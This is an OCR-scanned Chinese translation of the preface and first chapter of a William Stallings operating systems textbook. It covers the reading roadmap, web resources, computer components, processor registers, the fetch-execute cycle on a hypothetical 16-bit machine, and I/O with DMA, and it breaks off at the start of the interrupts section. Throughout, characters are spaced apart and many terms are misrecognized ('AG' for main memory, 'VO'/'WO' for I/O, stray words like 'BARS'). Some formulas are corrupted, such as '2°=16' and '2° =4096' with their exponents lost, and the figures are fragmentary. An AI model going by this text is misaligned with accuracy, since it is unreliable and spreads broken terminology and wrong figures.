人 能 入 式 操 作 系统 。 本 章 讨论 了 舱 人 式 操 作 系统 的 一 般 性 原理 , 并 且 介 绍 了 两 个 实例 系统 : TinyOS 
和 eCos。 
第 七 部 分 ”安全 : 对 涉及 计算 机 和 网 络 安全 的 威胁 和 防护 机 制 进行 了 概述 。 
BARS ”分布 式 系统 : 分 析 计 算 机 系统 网 络 化 技术 的 主要 趋势 ， 包 括 TCP/IP、 客 户 / 服 务 
器 计算 和 和 集群， 同时 还 介绍 分 布 式 系统 开发 中 的 一 些 主要 设计 领域 。 
本 书 试图 使 读者 熟悉 当代 操作 系统 的 设计 原理 和 实现 问题 ,因此 单纯 的 概念 和 理论 是 远 远 不 
够 的 。 为 举例 说 明 这 些 概念 ， 并 把 它们 与 现实 世界 中 必须 做 的 设计 选择 联系 起 来 , 本 书 选用 了 两 
个 操作 系统 作为 运行 实例 : 
@ Windows Vista: 可 以 在 各 种 各 样 的 个 人 计算 机 、 工 作 站 和 服务 器 上 运行 的 多 任务 操作 
系统 。 这 是 为 数 不 多 的 几 个 从 零 开 始 设计 的 商用 操作 系统 之 一 ， 因 此 它 具 有 操作 系统 技 
术 最 新 发 展 的 鲜明 风格 。 

@ UNIX: 一 个 多 用 户 操 作 系 统 , 最 初 是 为 小 型 计算 机 设计 的 , 但 后 来 广泛 用 于 从 微机 到 超 
级 计算 机 的 各 种 机 器 中 。 

关于 这 些 示例 系统 的 讨论 贯穿 于 本 书 的 全 部 内 容 ， 而 不 是 集中 在 某 一 章 或 附录 部 分 。 这 样 ， 
在 讨论 并 发 性 的 过 程 中 , 将 讲述 每 个 示例 系统 的 并 发 机 制 , 并 讨论 单个 设计 选择 的 动机 。 使 用 这 
种 方法 ， 可 以 通过 真实 的 例子 加 深 对 某 一 特定 章节 中 设计 概念 的 理解 。 


0.2 读者 和 教师 的 学 习 路 线 图 


读者 可 能 会 很 自然 地 对 本 书 中 的 主题 顺序 提出 疑问 。 例 如 ， 有 关 调 度 的 主题 (第 9 章 和 第 
10 章 ) 与 有 关 并 发 的 主题 (第 5 章 和 第 6 章 ) 以 及 进程 (第 3 章 ) 密切 相关 ， 似 乎 应 该 安排 在 
一 起 。 
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困难 在 于 各 个 主题 都 是 紧密 关联 的 。 例 如 , 在 讨论 虚拟 存储 器 时 ,如 果 能 够 参考 调度 问题 中 
的 缺 页 处 理 , 则 是 非常 有 用 的 ; 当然 , 在 讨论 调度 决策 时 ， 如 果 能 够 参考 一 些 存储 器 管理 的 问题 
也 是 非常 有 用 的 。 这 类 例子 举 不 胜 举 : 讨论 调度 需要 输入 /输出 管理 的 部 分 内 容 ， 反 之 亦 然 。 

图 0.1 给 出 了 各 个 主题 间 一 些 重要 的 相互 关系 。 粗 线 表示 从 设计 和 实现 的 角度 考虑 非常 紧密 
的 关系 。 基 于 这 幅 图 , 很 显然 应 该 从 关于 进程 的 最 基本 的 讨论 开始 , 正如 我 们 在 第 3 章 中 所 做 的 。 
接 下 来 的 顺序 就 有 一 定 的 任意 性 ,很 多 操作 系统 的 书籍 在 一 开始 把 所 有 与 进程 相关 的 内 容 放 在 一 
E, 然后 再 处 理 其 他 主题 , 这 无 疑 是 正确 的 。 但 我 相信 存储 器 管理 与 进程 管理 具有 同样 重要 的 地 
fi, 因此， 在 本 书 中 将 这 部 分 内 容 放 在 调度 之 前 。 





图 0.1 操作 系统 的 各 个 主题 


对 学 生 而 言 , 最 理想 的 安排 是 , 在 按 顺 序 学 习 完 第 1 章 到 第 3 章 后 , 并 行 地 阅读 和 理解 以 下 
Si. 第 4 章 然后 ( 任 选 ) 第 5 章 ; 第 6 章 然 后 第 7 章 ; 第 8 章 然后 ( 任 选 ) 第 9 章 ; 第 10 章 。 
其 余部 分 可 以 以 任意 顺序 学 习 。 当 然 ， 尽管 人 脑 可 能 可 以 并 行 处 理 , 但 让 学 生 同 时 打开 同样 的 4 
本 书 ， 并 翻 到 不 同 的 4 章 进行 学 习 几 乎 是 不 可 能 的 ( 同时 代价 也 过 于 昂贵 )。 既 然 必 须 按照 线性 
顺序 学 习 ， 我 认为 本 书 的 顺序 安排 是 最 有 效 的 。 

最 后 补充 一 句 ,第 2 章 特别 是 2.3 节 中 给 出 了 后 续 章 节 中 涵盖 的 所 有 重要 概念 的 介绍 。 因此， 
读 完 第 2 章 后 ， 可 以 灵活 选择 阅读 其 余 章节 的 顺序 。 


0.3 Internet 和 Web 资源 
在 Internet 中 和 本 书 的 支持 站 点 中 有 很 多 有 用 的 资源 ,可 以 帮助 读者 跟 上 该 领域 的 发 展 步伐 。 


本 书 的 Web 站 点 


WilliamStallings.com/OS/OS6e.html 是 专门 为 本 书 所 建立 的 Web 页 ， 有 关 该 站 点 的 详细 描述 
请 参阅 本 书 开始 处 的 内 容 ， 该 站 点 特别 为 学 生 提供 了 两 种 文档 : 

@ 伪 代码 : 本 书 为 那些 对 C 和 Java 均 不 熟悉 的 读者 , 用 类 Pascal 的 伪 代 码 重 新 生成 了 所 有 
的 算法 。 这 种 伪 代 码 语言 非常 直观 ， 易 于 理解 。 

@ Vista, UNIX 与 Linux 说 阴 ， 正 如 前 面 所 提 到 的 ， 把 Windows 和 各 种 不 同 版 本 的 UNIX 
都 作为 运行 实例 研究 ， 关 于 它们 的 讨论 贯穿 于 本 书 的 全 部 内 容 ， 而 不 是 集中 在 某 一 章 或 
附录 部 分 。 一 些 读者 可 能 希望 把 所 有 这 些 资料 放 在 一 起 以 供 参 考 ， 因此， 本 书 中 所 有 关 
于 Windows, UNIX 和 Linux 的 资料 都 重新 整理 成 为 该 站 点 中 的 三 个 文件 。 
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只 要 发 现 了 任何 印刷 错误 和 别 的 错误 ， 在 该 Web 站 点 中 就 可 以 找到 勘误 表 。 欢 迎 读者 报告 
发 现 的 任何 错误 。 作 者 的 其 他 书籍 的 勘误 表 以 及 优惠 订购 信息 均 在 WilliamStallings.com P o 
作者 还 在 WilliamStallings.com/studentSupport.html 中 维护 了 一 个 Computer Science Student 
Support Site 站 点 ， 该 站 点 为 计算 机 科学 专业 的 学 生 及 专业 人 员 提 供 资料 、 信 息 和 链接 ， 链 接 和 
文档 可 分 为 以 下 6 类 : 
数学 : 包括 基本 数学 知识 的 复习 、 排 队 论 人 门 、 计 数 系统 入 门 和 到 很 多 数学 站 点 的 链接 。 
指引 类 : 为 完成 作业 、 编 写 技术 报告 和 准备 技术 演示 提供 的 建议 和 指导 。 
研究 资源 : 关于 很 多 重要 的 论文 、 技 术 报 告 和 参考 文献 的 链接 。 
其 他 : 大 量 有 用 的 资料 和 链接 。 。 
计算 机 科学 职业 : 对 考虑 计算 机 科学 职业 规划 有 用 的 链接 和 资料 。 
幽默 和 其 他 趣事 :工作 之 余 有 时 也 需要 放松 一 下 。 


其 他 Web 站 点 


还 有 很 多 站 点 提供 了 与 本 书 相关 的 某 些 信息 。 在 后 续 的 章节 中 ,在 “推荐 读物 和 Web 站 点 ” 
一 节 中 可 以 找到 一 些 特定 Web 站 点 的 链接 。 由 于 Web 站 点 的 URL 地 址 有 可 能 更 新 ， 因 此 本 书 
将 不 再 包含 这 些 URL 地 址 。 本 书 所 列 出 的 所 有 Web 站 点 ， 都 将 列 在 本 书 的 网 站 上 。 本 书 中 未 涉 
及 的 其 他 链接 也 会 及 时 补充 到 Web 站 点 上 。 


USENET 新 闻 组 


很 多 USENET 新 闻 组 都 致力 于 操作 系统 的 某 一 方面 或 某 个 特定 的 操作 系统 。 事 实 上 所 有 的 
USENET 组 都 有 很 高 的 噪 信 比 , 但 仍然 值得 去 试 一 试 , 看 是 否 有 满足 自己 需要 的 。 其 中 ,最 相关 
的 如 下 所 示 : 

© comp.os.research: 这 是 值得 关注 的 最 好 的 组 ， 是 关于 研究 主题 的 一 个 合适 的 新 闻 组 。 

comp.os.misc: 关于 操作 系统 主题 的 一 个 全 面 的 讨论 。 


Dd 
© comp.unix.internals 
o 


comp.os.linux.development.system 











第 一 部 分 的 目标 是 为 本 书 的 其 余部 分 提供 背景 知识 和 上 下 文 环 境 , 给 出 关于 计算 机 系统 结构 
和 操作 系统 核心 的 基本 概念 。 


第 一 部 分 导读 


第 1 章 计算 机 系统 概述 


操作 系统 处 于 中 间 位 置 , 它 的 一 边 是 应 用 程序 、 实 用 程序 和 用 户 , 另 一 边 是 计算 机 系统 的 硬 
件 。 为 了 理解 操作 系统 的 功能 和 涉及 的 设计 问题 , 必须 首先 对 计算 机 组 织 与 系统 结构 有 一 定 的 认 
识 。 第 1 章 提 供 了 对 计算 机 系统 中 的 处 理 器 、 内 存 和 输入 /输出 原理 的 简要 介绍 。 


第 2 章 操作 系统 概述 


关于 操作 系统 设计 的 主题 涉及 很 多 领域 , 学 习 时 很 容易 在 大 量 的 细节 中 迷失 方向 , 且 在 讨论 
茶 个 特定 问题 时 容易 丢掉 问题 的 前 后 关系 。 第 2 章 为 读者 提供 了 一 个 总 览 ,方便 读者 在 本 书 的 任 
何 一 处 找到 其 前 后 关系 。 本 书 从 操作 系统 的 目标 和 功能 开始 陈述 , 然后 描述 一 些 在 历史 上 非常 重 
要 的 系统 和 操作 系统 的 功能 。 通过 这 样 的 论述 , 可 在 一 个 简单 的 环境 中 给 出 基本 的 操作 系统 设计 
. 原理 , 从 而 使 不 同 的 操作 系统 功能 之 间 的 关系 变 得 十 分 清楚 。 本 章 还 强调 了 现代 操作 系统 的 重要 
特征 。 通 过 贯穿 本 书 的 各 种 各 样 的 主题 论述 ,不仅 讨论 了 操作 系统 设计 中 最 基本 的 和 完善 的 原理 ， 
而 且 还 讨论 了 操作 系统 设计 中 最 新 的 创新 。 本 章 的 论述 将 告诉 读者 操作 系统 中 已 建立 的 和 新 的 设 
计 方法 所 必须 解决 的 问题 。 最 后 ， 对 Windows, UNIX 和 Linux 进行 了 概述 ， 并 建立 了 这 些 操作 
系统 的 总 体 结构 ， 为 接 下 来 更 详细 的 讨论 提供 了 前 后 联系 。 


第 1 章 计算 机 系统 概述 


操作 系统 利用 一 个 或 多 个 处 理 器 的 硬件 资源 , 为 系统 用 户 提供 一 组 服务 , 它 还 代表 用 户 来 管 
理 辅助 存储 器 和 输入 /输出 (Input/Output, 10) 设备 。 因 此 ,在 开始 分 析 操 作 系 统 之 前 ， 掌 握 一 
些 底层 的 计算 机 系统 硬件 知识 是 很 重要 的 。 

本 章 给 出 了 计算 机 系统 硬件 的 概述 并 假设 读者 对 这 些 领域 已 经 比较 熟悉 , 所 以 对 大 多 数 领 
域 只 进行 简要 概述 。 但 某 些 内 容 对 本 书后 面 的 主题 比较 重要 ， 因 此 对 这 些 内 容 的 讲述 将 会 比较 
详细 。 


1.1 基本 构成 


从 最 顶层 看 ， 一 台 计 算 机 由 处 理 器 、 存 储 器 和 输入 /输出 部 件 组 成 ， 每 类 部 件 有 一 个 或 多 个 
模块 。 这 些 部 件 以 某 种 方式 互联 ， 以 实现 计算 机 执行 程序 的 主要 功能 。 因 此 ， 计 算 机 有 4 个 主要 
的 结构 化 部 件 : 
© 处 理 器 (processor): 控制 计算 机 的 操作 ， 执 行 数据 处 理 功能 。 当 只 有 一 个 处 理 器 时， 
它 通常 指 中 央 处 理 单元 (CPU )。 

@ AG (main memory): 存储 数据 和 程序 。 此 类 存储 器 通常 是 易 失 性 的 ， 即 当 计算 机 关机 
时 ,存储 器 的 内 容 会 丢失 。 相 反 ， 当 计算 机 关机 时 ， 磁 盘存 储 器 的 内 容 不 会 丢失 。 内 存 
通常 也 称 为 实 存储 器 (real memory) 或 主 存储 器 (primary memory). 

o 输入 /输出 模块 (I/O module): 在 计算 机 和 外 部 环境 之 间 移 动 数 据 。 外 部 环境 由 各 种 外 

部 设备 组 成 ， 包 括 辅助 存储 器 设备 ( 如 硬盘 )、 通 信 设 备 和 终端 。 

@ 系统 总 线 (system bus): 为 处 理 器 、 内 存 和 输入 /输出 模块 间 提 供 通信 的 设施 。 

图 1.1 描述 了 这 些 从 最 顶层 看 到 的 部 件 。 处 理 器 的 一 种 功能 是 和 存储 器 交换 数据 。 为 此 ， 它 
通常 使 用 两 个 内 部 ( 对 处 理 器 而 言 寄存器 :存储 器 地 址 寄存 器 ( Memory Address Register, MAR )， 
存储 器 地 址 寄存 器 确定 下 一 次 读 写 的 存储 器 地 址 ; 存储 器 缓冲 寄存 器 ( Memory Buffer Register, 
MBR )， 存 储 器 缓冲 寄存 器 存放 要 写 人 存储 器 的 数据 或 者 从 存储 器 中 读 取 的 数据 。 同 理 ， 输 
人 /输出 地 址 寄存 器 (IO Address Register， 简 称 I/O AR 或 VO 地 址 寄存 器 ) 确定 一 个 特定 的 输 
人 /输出 设备 ， 输 入 /输出 缓冲 寄存 器 ( IO Buffer Register， 简 称 MO BR 或 IO 缓冲 寄存 器 ) 用 于 
在 输入 /输出 模块 和 处 理 器 间 交 换 数据 。 

内 存 模块 由 一 组 单元 组 成 ， 这 些 单元 由 顺序 编号 的 地 址 定义 。 每 个 单元 包含 一 个 二 进 制 数 ， 
可 以 解释 为 一 个 指令 或 数据 。 输 入 /输出 模块 在 外 部 设备 与 处 理 器 和 存储 器 之 间 传 送 数 据 。 输 
人 /输出 模块 包含 内 存 缓冲 区 ， 用 于 临时 保存 数据 ， 直 到 它们 被 发 送出 去 。 


1.2 ”处 理 器 寄存 器 


处 理 器 包含 一 组 寄存 器 , 它们 提供 一 定 的 存储 能 力 , 比 内 存 访问 速度 快 , 但 比 内存 的 容量 小 。 

处 理 器 中 的 寄存 器 有 两 个 功能 : 
@ 用 户 可 见 寄存 器 : 优先 使 用 这 些 寄存 器 ， 可 以 减少 使 用 机 器 语言 或 汇编 语言 的 程序 员 对 
内 存 的 访问 次 数 。 对 高 级 语言 而 言 , 由 优化 编译 器 负责 决定 哪些 变量 应 该 分 配给 寄存 器 ， 
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量 保 存在 寄存 器 中 。 l 
@ 控制 和 状态 寄存 器 : 用 以 控制 处 理 器 的 操作 ， 且 主要 被 具有 特权 的 操作 系统 例 程 使 用 ， 
以 控制 程序 的 执行 。 
CPU 
PC MAR 系统 总 线 
IR MBR 
VO AR 
AAA 执行 单元 
IO BR 
输入 /输出 模块 1 j, 
一] 
PC 表示 程序 计数 器 
IR 表示 指令 寄存 器 
MAR 表示 存储 器 地 址 寄存 器 
MBR 表示 存储 器 缓冲 寄存 器 
V/O AR 表示 IO 地 址 寄存 器 
VO BR 表示 VO 缓冲 寄存 器 


图 1.1 计算 机 部 件 : 顶层 视图 


这 两 类 寄存 器 并 没有 很 明显 的 界限 。 例 如 ， 对 某 些 处 理 器 而 言 ， 程 序 计 数 器 是 用 户 可 见 的 ， 
但 对 其 他 处 理 器 却 不 是 这 样 。 但 为 了 方便 起 见 ， 以 下 的 讨论 使 用 这 种 分 类 方法 。 


1.2.1 用 户 可 见 寄存 器 


用 户 可 见 寄 存 器 可 以 通过 由 处 理 器 执行 的 机 器 语言 来 引用 ， 它 一 般 对 所 有 的 程序 都 是 可 用 
的 , 包括 应 用 程序 和 系统 程序 。 通 常 可 用 的 寄存 器 类 型 包括 数据 寄存 器 、 地 址 寄存 器 和 条 件 码 寄 
存 器 。 
数据 寄存 器 (data register) 可 以 被 程序 员 分 配给 各 种 函数 。 在 某 些 情况 下 ， 它 们 实际 上 是 
通用 的 , 可 被 执行 数据 操作 的 任何 机 器 指令 使 用 。 但 通常 也 有 一 些 限 制 , 例如 对 浮 点 数 运算 使 用 
专用 的 寄存 器 ， 而 对 整数 运算 使 用 其 他 寄存 器 。 
地 址 寡 存 器 (address register) 存放 数据 和 指令 的 内 存 地 址 ， 或 者 存放 用 于 计算 完整 地 址 
或 有 效 地 址 的 部 分 地 址 。 这 些 寄存 器 可 以 是 通用 的 , 或 者 可 以 用 来 以 某 一 特定 方式 或 模式 寻 址 存 
储 器 。 如 下 面 的 例子 所 示 : 
© 变 址 寄存 器 (index register): 变 址 寻 址 是 一 种 最 常用 的 寻 址 方式 ， 它 通过 给 一 个 基 值 加 
一 个 索引 来 获得 有 效 地 址 。 

@ 段 指针 〈segment pointer): 对 于 分 段 寻 址 方式 ， 存 储 咯 被 划分 成 段 ， 这 些 段 由 长 度 不 
等 的 字 块 组 成 9, 段 由 若干 长 度 的 字 组 成 。 一 个 存储 器 引用 由 一 个 特定 段 号 和 段 内 的 偏 移 
量 组 成 ; 在 第 7 章 关 于 内 存 管 理 的 论述 中 ， 这 种 寻 址 方式 是 非常 重要 的 。 采 用 这 种 寻 址 


O 术语 字 无 通用 的 定义 。 一 般 来 说 ， 字 是 字 节 或 位 的 -- 个 有 序 集合 ， 字 节 或 位 是 在 给 定 的 计算 机 上 存储 、 发 送 
或 操作 信息 的 通用 单位 。 一 般 地 ， 若 处 理 器 有 一 个 定 长 指令 集 ， 则 指令 长 度 等 于 字 长 。 
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方式 ， 需 要 用 一 个 寄存 器 保存 段 的 基地 址 (起 始 地 址 )。 可 能 存在 多 个 这 样 的 寄存 器 , Bl 
如 一 个 用 于 操作 系统 ( 即 当 操作 系统 代码 在 处 理 器 中 执行 时 使 用 ), 一 个 用 于 当前 正在 执 
行 的 应 用 程序 。 
@ 栈 指针 (stack pointer): 如 果 对 用 户 可 见 的 栈 ? 进 行 寻 址 ， 则 应 该 有 一 个 专门 的 寄存 器 
指向 栈 顶 。 这 样 就 可 以 使 用 不 包含 地 址 域 的 指令 ， 如 入 栈 (push) 和 出 栈 (pop )。 
对 于 有 些 处 理 器 , 过 程 调用 将 导致 所 有 用 户 可 见 的 寄存 器 自动 保 在 , 在 调用 返回 时 恢复 保存 
的 寄存 器 。 由 处 理 器 执行 的 保存 操作 和 恢复 操作 是 调用 指令 和 返回 指令 执行 过 程 的 一 部 分 。 这 就 
允许 每 个 过 程 独立 地 使 用 这 些 寄存 器 。 而 在 其 他 的 处 理 器 上 , 程序 员 必须 在 过 程 调用 前 保存 相应 
的 用 户 可 见 寄存 器 , 通过 在 程序 中 包含 完成 此 项 任务 的 指令 来 实现 。 因 此 , 保存 和 恢复 功能 可 以 
由 硬件 完成 ， 也 可 以 由 软件 完成 ， 这 完全 取决 于 处 理 器 的 实现 。 


1.2.2 控制 和 状态 寄存 器 


有 多 种 处 理 器 的 寄存 器 用 于 控制 处 理 器 的 操作 。 在 大 多 数 处 理 器 上 , 大 部 分 此 类 寄存 器 对 用 
户 不 可 见 ， 其 中 一 部 分 可 被 在 控制 态 (或 称 为 内 核 态 ) 下 执行 的 某 些 机 器 指令 所 访问 。 

当然 , 不同 的 处 理 器 有 不 同 的 寄存 器 结构 , 并 使 用 不 同 的 术语 。 在 这 里 我 们 列 出 了 比较 合理 
和 完全 的 寄存 器 类 型 ， 并 给 出 了 简要 的 说 明 。 除 了 前 面 提 到 过 的 MAR、MBR、LO AR 和 VO BR 
寄存 器 ( 如 图 1.1 所 示 ) 外 ,下 面 的 寄存 器 是 指令 执行 所 必需 的 : 

@ 程序 计数 器 (Program Counter, PC): 包含 将 取 指 令 的 地 址 。 

@ 指令 寄存 器 (Instruction Register, IR): 包含 最 近 取 的 指令 内 容 。 

所 有 的 处 理 器 设计 还 包括 一 个 或 一 组 寄存 器 ， 通 常 称 为 程序 状态 字 ( Program Status Word, 
PSW )， 它 包含 状态 信息 。PSW 通常 包含 条 件 码 和 其 他 状态 信息 ， 如 中 断 允许 /禁止 位 和 内 核 /用 
户 态 位 。 

条 件 码 (condition code， 也 称 为 标记 ) 是 处 理 器 硬件 为 操作 结果 设置 的 位 。 例 如 ,算术 运算 
可 能 产生 正 数 、 负数 、 零 或 溢出 的 结果 ,除了 结果 自身 存储 在 一 个 寄存 器 或 存储 器 中 之 外 ， 在 算 
术 指 令 执行 之 后 ,也 随 之 设置 一 个 条 件 码 。 这 个 条 件 码 之 后 可 作为 条 件 分 支 运算 的 一 部 分 被 测试 。 
条 件 码 位 被 收集 到 一 个 或 多 个 寄存 器 中 , 通常 它们 构成 了 控制 寄存 器 的 一 部 分 。 机 器 指令 通常 允 
许 通过 隐 式 访问 来 读 取 这 些 位 , 但 不 能 通过 显 式 访问 进行 修改 , 这 是 因为 它们 是 为 指令 执行 结果 
的 反馈 而 设计 的 。 

在 使 用 多 种 类 型 中 断 的 处 理 器 中 , 通常 有 一 组 中 断 寄存 器 , 每 个 指向 一 个 中 断 处 理 例 程 。 如 
果 使 用 栈 实现 某 些 功能 ( 例如 过 程 调用 )， 则 需要 一 个 系统 栈 指针 (参见 附录 1B )。 第 7 章 讲述 
的 内 存 管理 硬件 也 需要 专门 的 寄存 器 。 最 后 ， 寄 存 器 还 可 以 用 于 控制 IO 操作 。 

在 设计 控制 和 状态 寄存 器 结构 时 需要 考虑 很 多 因素 , 一 个 关键 问题 是 对 操作 系统 的 支持 。 某 
些 类 型 的 控制 信息 对 操作 系统 来 说 有 特殊 的 用 途 ,如 果 处 理 器 设计 者 对 所 用 操作 系统 的 功能 有 所 
了 解 ,那么 可 以 设计 寄存 器 结构 ,对 操作 系统 的 特殊 功能 提供 硬件 支持 ， 如 存储 器 保护 和 用 户 程 
序 之 间 的 切换 等 。 

另 一 个 重要 的 设计 决策 是 在 寄存 器 和 存储 器 间 分 配 控制 信息 。 通 常 把 存储 器 最 初 的 ( 最 低 的 ) 
几 百 个 或 几 千 个 字 用 于 控制 目的 ， 设 计 者 必须 决定 在 昂贵 、 高 速 的 寄存 器 中 放置 多 少 控制 信息 ， 
在 相对 便宜 、 低 速 的 内 存 中 放置 多 少 控制 信息 。 





O ” 栈 位 于 内 存 中 ， 它 是 一 组 连续 的 存储 单元 ， 对 它 的 访问 类 似 于 处 理 一 瑟 纸 ， 只 能 从 顶层 放置 或 取 走 。 有 关 栈 
处 理 的 详细 内 容 ， 请 参阅 附录 1B。 
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1.3 ”指令 的 执行 

处 理 器 执行 的 程序 是 由 一 组 保存 在 存储 器 中 的 指令 组 成 的 。 按 最 简单 的 形式 , 指令 处 理 包括 
两 个 步骤 : 处 理 器 从 存储 器 中 一 次 读 ( 取 ) 一 条 指令 , 然后 执行 每 条 指令 。 程 序 执行 是 由 不 断 重 
复 的 取 指 令 和 执行 指令 的 过 程 组 成 的 。 指 令 执 行 可 能 涉及 很 多 操作 ， 这 取决 于 指令 自身 。 

一 个 单一 的 指令 需要 的 处 理 称 为 一 个 指令 周期 。 如 图 1.2 所 示 ， 可 使 用 简单 的 两 个 步骤 来 描 
述 指令 周期 。 这 两 个 步 又 分 别称 做 取 指 阶段 和 执行 阶段 。 仅 当 机 器 关机 、 发 生 某 些 未 发 现 的 错误 
或 者 遇 到 与 停机 相关 的 程序 指令 时 ， 程 序 执行 才 会 停止 。 


取 指 阶段 执行 阶段 











图 1.2 基本 指令 周期 


1.3.1 取 指 令 和 执行 指令 


在 每 个 指令 周期 开始 时 ， 处理 器 从 存储 器 中 取 一 条 指令 。 在 典型 的 处 理 器 中 ， 程 序 计 数 器 
( Program Counter, PC) 保存 下 一 次 要 取 的 指令 地 址 。 除 非 有 其 他 情况 ， 备 则 处 理 器 在 每 次 取 指 
令 后 总 是 递增 PC, 使 得 它 能 够 按 顺 序 取得 下 一 条 指令 ( 即位 于 下 一 个 存储 器 地 址 的 指令 )。 例 如 ， 
考虑 一 个 简化 的 计算 机 ， 每 条 指令 占据 存储 器 中 一 个 16 位 的 字 ， 假 设 程序 计数 器 PC 被 设置 为 
地 址 300, 处 理 器 下 一 次 将 在 地 址 为 300 的 存储 单元 处 取 指 令 ， 在 随后 的 指令 周期 中 ， 它 将 从 地 
址 为 301、302、303 等 的 存储 单元 处 取 指 令 。 下 面 将 会 解释 这 个 顺序 是 可 以 改变 的 。 

取 到 的 指令 被 放置 在 处 理 器 的 一 个 寄存 器 中 ， 这 个 寄存 器 称 做 指令 寄存 器 (Instruction 
Register, IR )。 指令 中 包含 确定 处 理 器 将 要 执行 的 操作 的 位 , 处 理 器 解释 指令 并 执行 对 应 的 操作 。 
大 体 上 ， 这 些 操作 可 分 为 4 类: 

o 处 理 器 -存储 器 : 数据 可 以 从 处 理 器 传送 到 存储 器 ， 或 者 从 存储 器 传送 到 处 理 器 。 

@ 处 理 器 -IO: 通过 处 理 器 和 VO 模块 闻 的 数据 传送 ， 数 据 可 以 输出 到 外 部 设备 ， 或 者 从 

外 部 设备 输入 数据 。 

@ 数据 处 理 : 处 理 器 可 以 执行 很 多 与 数据 相关 的 算术 操作 或 逻辑 操作 。 

o 控制 : 某 些 指令 可 以 改变 执行 顺序 。 例 如 ， 处 理 器 从 地 址 为 149 的 存储 单元 中 取出 一 条 
指令 ， 该 指令 指定 下 一 条 指令 应 该 从 地 址 为 182 的 存储 单元 中 取 ， 这 样 处 理 器 要 把 程序 
计数 器 设置 为 182。 因 此 ， 在 下 一 个 取 指 阶段 中 ， ica 182 的 存储 单元 而 不 是 地 
址 为 150 的 存储 单元 中 取 指 令 。 

指令 的 执行 可 能 涉及 这 些 行为 的 组 合 

考虑 一 个 简单 的 例子 ， 假设 有 一 台 机 器 具备 图 1.3 中 列 出 的 所 有 特征 ， 处 理 器 包含 一 个 称 为 
累加 器 (AC) 的 数据 寄存 器 ， 所 有 指令 和 数据 长 度 均 为 16 位 ， 使 用 16 位 的 单元 或 字 来 组 织 存 
储 器 。 指 令 格式 中 有 4 位 是 操作 码 ， 因 而 最 多 有 2°=16 种 不 同 的 操作 码 (由 1 位 十 六 进 制 s 数 字 
表示 )， 操 作 码 定义 了 处 理 器 要 执行 的 操作 。 通 过 指令 格式 的 余下 12 位 , 可 直接 访问 的 存储 器 大 
小 最 大 为 2° =4096 (4K) 个 字 (用 3 位 十 六 进 制 数字 表示 )。 


O ARR (十进制 、 二 进 制 、 十 六 进 制 ) 的 详细 信息 ， 可 在 WilliamStallings.com/StudentSupport.html 中 
的 Computer Science Student Resource Site 站 点 找到 。 








a) 指令 格式 






b) 整数 格式 
程序 计数 器 PC》= 指 令 地 址 

指令 寄存 器 〈 琢 ) -正在 执行 的 指令 
RME (AC) = 临时 存储 体 


c) 内 部 CPU 寄存 器 


0001= 从 存储 器 中 加 载 AC 
0010= 把 AC 的 内 容 存储 到 存储 器 中 
0101= 从 存储 器 中 加 到 AC 中 

d) 部 分 操作 码 列表 


1.3 ”一 台 理 想 机 器 的 特征 
图 1.4 描述 了 程序 的 部 分 执行 过 程 ， 显 示 了 存储 器 和 处 理 器 的 寄存 器 的 相关 部 分 。 给 出 的 程 


序 片段 把 地 址 为 940 的 存储 单元 中 的 内 容 与 地 址 为 941 的 存储 单元 中 的 内 容 相 加 ,并 将 结果 保存 
在 后 一 个 单元 中 。 这 需要 三 条 指令 ， 可 用 三 个 取 指 阶段 和 三 个 执行 阶段 描述 : 


取 指 阶段 执行 阶段 





图 1.4 程序 执行 的 例子 〈 存储 器 和 寄存 器 的 内 容 以 十 六 进 制 表示 ) 


1 ) PC 中 包含 第 一 条 指令 的 地 址 为 300, 该 指令 内 容 ( 值 为 十 六 进 制 数 1940) 被 送 入 指令 寄 
存 器 IR 中 ，PC 增 1。 注 意 ， 此 处 理 过 程 使 用 了 存储 器 地 址 寄存 器 (MAR) 和 存储 器 组 
冲 寄存 器 (MBR )。 为 简单 起 见 ， 这 些 中 间 寄 存 器 没有 显示 。 

2 ) IR 中 最 初 的 4 位 (第 一 个 十 六 进 制 数 ) 表示 需要 加 载 AC， 剩 下 的 12 位 ( 后 三 个 十 六 进 
制 数 ) 表示 地 址 为 940。 

3) 从 地 址 为 301 的 存储 单元 中 取 下 一 条 指令 (5941 )，PC 增 1。 
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4) AC 中 以 前 的 内 容 和 地 址 为 941 的 存储 单元 中 的 内 容 相 加 ， 结 果 保 存在 AC 中 。 

5) 从 地 址 为 302 的 存储 单元 中 取 下 一 条 指令 ( 2941 )，PC 增 1。 

6) AC 中 的 内 容 被 存储 在 地 址 为 941 的 存储 单元 中 。 

在 这 个 例子 中 ,为 把 地 址 为 940 的 存储 单元 中 的 内 容 与 地 址 为 941 的 存储 单元 中 的 内 容 相 加 ， 
一 共 需 要 三 个 指令 周期 , 每 个 指令 周期 都 包含 一 个 取 指 阶段 和 一 个 执行 阶段 。 如 果 使 用 更 复杂 的 
指令 集合 , 则 只 需要 更 少 的 指令 周期 。 大 多 数 现代 的 处 理 器 都 具有 包含 多 个 地 址 的 指令 ， 因 此 指 
令 周 期 可 能 涉及 多 次 存储 器 访问 。 此 外 ， 除 了 存储 器 访问 外 ， 指 令 还 可 用 于 IO 操作 。 


1.3.2 1/0 函数 


VO 模块 (例如 磁盘 控制 器 ) 可 以 直接 与 处 理 器 交换 数据 。 正 如 处 理 器 可 以 通过 指定 存储 单 
元 的 地 址 来 启动 对 存储 器 的 读 和 写 一 样 , 处理 器 也 可 以 从 IO 模块 中 读数 据 或 向 WO 模块 中 写 数 
据 。 对 于 后 一 种 情况 ， 处 理 器 需要 指定 被 某 一 VO 模块 控制 的 具体 设备 。 因 此 ， 指令 序列 的 格式 
与 图 1.4 中 的 格式 类 似 ， 只 是 用 IO 指令 代替 了 存储 器 访问 指令 。 

在 某 些 情况 下 ， 允 许 IO 模块 直接 与 内 存 发 生 数据 交换 ， 以 减轻 在 完成 WO 任务 过 程 中 的 处 
理 器 负担 。 此 时 ， 处理 器 允许 WO 模块 具有 从 存储 器 中 读 或 往 存 储 器 中 写 的 特权 ， 这 样 LO 模块 
与 存储 器 之 间 的 数据 传送 无 需 通过 处 理 器 完成 。 在 这 类 传送 过 程 中 ，LIO 模块 对 存储 器 发 出 读 命 
令 或 写 命令 ， 从 而 免 去 了 处 理 器 负责 数据 交换 的 任务 。 这 个 操作 称 为 直接 内 存 存 取 (Direct 
Memory Access，DMA )， 详 细 内 容 请 参阅 本 章 后 面部 分 。 


1.4 中 断 


事实 上 所 有 计算 机 都 提供 了 允许 其 他 模块 ( WO、 存储 器 ) 中 断 处 理 器 正常 处 理 过 程 的 机 制 。 
表 1.1 列 出 了 最 常见 的 中 断 类 别 。 - 

